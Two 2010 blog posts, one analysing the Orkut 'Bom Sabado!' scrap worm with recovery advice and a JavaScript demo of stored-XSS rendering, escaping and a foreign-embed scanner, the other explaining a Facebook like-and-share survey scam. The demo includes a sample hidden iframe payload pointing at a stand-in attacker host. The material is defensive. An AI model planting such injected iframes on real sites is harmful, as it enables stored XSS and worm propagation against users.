Saturday, September 25, 2010

Bom Sabado! Orkut Worm!!

Blog moved. I have a new home now at Do update your bookmarks :)
Today I have been getting many scraps from friends (in Orkut!!!) with just the text "Bom Sabado!". Google Translate tells me that it means "Good Saturday!"; well, it seems like it's going to be a not-so-good Saturday for many!! As time passes, more and more people seem to be sending these scraps, indicating clearly that this is some kind of a worm.
So I thought of digging into it a bit deeper. I created a dummy account so that my normal account would not be affected, then added myself as a friend from the dummy account so that I could monitor it. Then I opened the scrap I got from the dummy account. While inspecting the source code, I found that the suspicion was true: it indeed is the work of a worm!! I found the following iframe code injected along with the message into the scrap.
This injected iframe loads the "worm.js" script from tptoolsorg, which apparently causes all the problems.

Downloading worm.js from the source and decoding it gives me the following observations.
  1. It uses standard JS objects and XMLHttpRequest to cause all sorts of trouble.
  2. The code is obfuscated by using octal representation for objects and weird names (e.g. _0x7c2bx4) for variables.
  3. It does the following if you open a scrap page:
  • Makes you join 5 communities.
  • Sends scraps to all your friends.

The following shows the part of the code that is responsible for the problems.

The main sign of infection is that your browser will hang for a while if you open such a page. If you find this happening to you, close the browser immediately; it will prevent the worm from spreading.

Recovery Methods
  1. Clear all the cookies and private data stored in the browser.
  2. Install Firefox and the NoScript add-on; it will block all scripts. Allow only those you want, but be careful not to allow scripts from tptoolsorg.
  3. Remove all the "Bom Sabado!" scraps from your Scrapbook.
  4. Be careful not to visit any of the infected pages until Google fixes this injection vulnerability.
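
To show what the injection vulnerability above looks like from the site's side, here is an added example (my own illustration, not code from Orkut or from worm.js): the scrap rendering that lets a pasted iframe go live, the entity-encoded form that fixes it, and a scanner that flags stored scraps embedding content from a foreign host. The scrap body, "attacker.example" and "orkut.example" are constructed placeholders.

```javascript
// Added example, not from the original post: stored-XSS rendering of a scrap,
// its hardened form, and a scanner for scraps already stored in a Scrapbook.
// The scrap body, "attacker.example" and "orkut.example" are CONSTRUCTED placeholders.

// Entity-encode the five HTML metacharacters so user text is displayed, not parsed.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the scrap body goes into the page markup verbatim, so an
// <iframe> typed into a message becomes a live element in every viewer's browser.
function renderScrapUnsafe(sender, body) {
  return `<div class="scrap"><b>${sender}</b>: ${body}</div>`;
}

// Hardened rendering: same output shape, but both fields are entity-encoded,
// so the viewer sees the literal text "<iframe ...>" and nothing is loaded.
function renderScrapSafe(sender, body) {
  return `<div class="scrap"><b>${escapeHtml(sender)}</b>: ${escapeHtml(body)}</div>`;
}

// Scanner for stored scraps: report iframe/script/embed/object tags whose src (or
// data) points at a host outside the allow-list. Relative URLs resolve against the
// site's own origin and are therefore treated as allowed.
function findForeignEmbeds(html, allowedHosts, siteOrigin = 'https://orkut.example/') {
  const tagRe = /<(iframe|script|embed|object)\b[^>]*?\s(?:src|data)\s*=\s*["']?([^"'\s>]+)/gi;
  const allowed = allowedHosts.map((h) => h.toLowerCase());
  const hits = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    let host;
    try {
      host = new URL(m[2], siteOrigin).hostname;
    } catch (e) {
      host = m[2]; // unparsable src: report it rather than silently skipping it
    }
    if (!allowed.includes(host)) hits.push({ tag: m[1].toLowerCase(), src: m[2], host });
  }
  return hits;
}

// Constructed sample: a "Bom Sabado!" greeting with a hidden iframe appended.
const SAMPLE_SCRAP_BODY =
  'Bom Sabado! <iframe src="http://attacker.example/bomsabado" width="0" height="0"></iframe>';
const ALLOWED_HOSTS = ['orkut.example'];

console.log(findForeignEmbeds(renderScrapUnsafe('friend', SAMPLE_SCRAP_BODY), ALLOWED_HOSTS));
console.log(findForeignEmbeds(renderScrapSafe('friend', SAMPLE_SCRAP_BODY), ALLOWED_HOSTS));
```

The first scan reports the foreign iframe; the second reports nothing, because the encoded scrap no longer contains a tag at all.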

Thursday, September 9, 2010


If you are a regular user of FB, there is a high chance that you have seen something like this in your News Feed.
The title will create such curiosity in one's mind that you will be forced to click on it. On clicking the link, you will be taken to a website with a "Like" button and with text asking you to click on the Like button to proceed.
If you click on the Like button, the page will be added to your Likes and Interests [as per FB documentation, a page you Like has the capability to publish content to your News Feed whenever it pleases, until you manually remove it]. Once you have Liked the page, it will again ask you to share it with your friends as Step 2 to view the "Amazing Content".

If you click the Share button, a popup window will come up asking you to share the content with your friends. If you try to skip it, an alert window will come up saying that unless you share this, you won't be able to see the content.
Driven by curiosity and unaware of the consequences, many people will actually share it!!, leading to further propagation of the scam. The result of all these so-called "Steps" is that you will be presented with a page asking you to perform "Human Verification" by completing a survey!! Each time someone does a survey, the scammer gets money!! and free publicity. What an amazing marketing strategy!!
How is it done?

By checking the source code of the page, it can be seen that the scammers are exploiting FB's own social plugin APIs!!
They have added a little JavaScript of their own to detect the user pressing the 'Like' button, and also to create an alert if the person refuses to publish it to friends.

In this particular case, FB's own APIs are being used, and no password-stealing code or malware download code has been found. But since a 'Liked' page has the capability to push content to the user, it is very much possible to spread worms/Trojans using similar tactics.
Digging deeper into the code, the final destination to which the user will be taken after Liking and Publishing is found.
If you visit this page directly, you will be treated to a page asking you to complete the survey. If you act fast enough to hit the 'Escape' key as soon as the page starts loading, to stop the advertisement from loading, you will be able to see the "Actual Amazing Content".

This is just one of the hundreds, if not thousands, of SCAMS being propagated over FB; most of them use the same tactics. If you have already fallen for one, go to Likes and Interests in your profile and remove the particular page. If you haven't, be careful not to become a victim. Happy Facebooking!! :)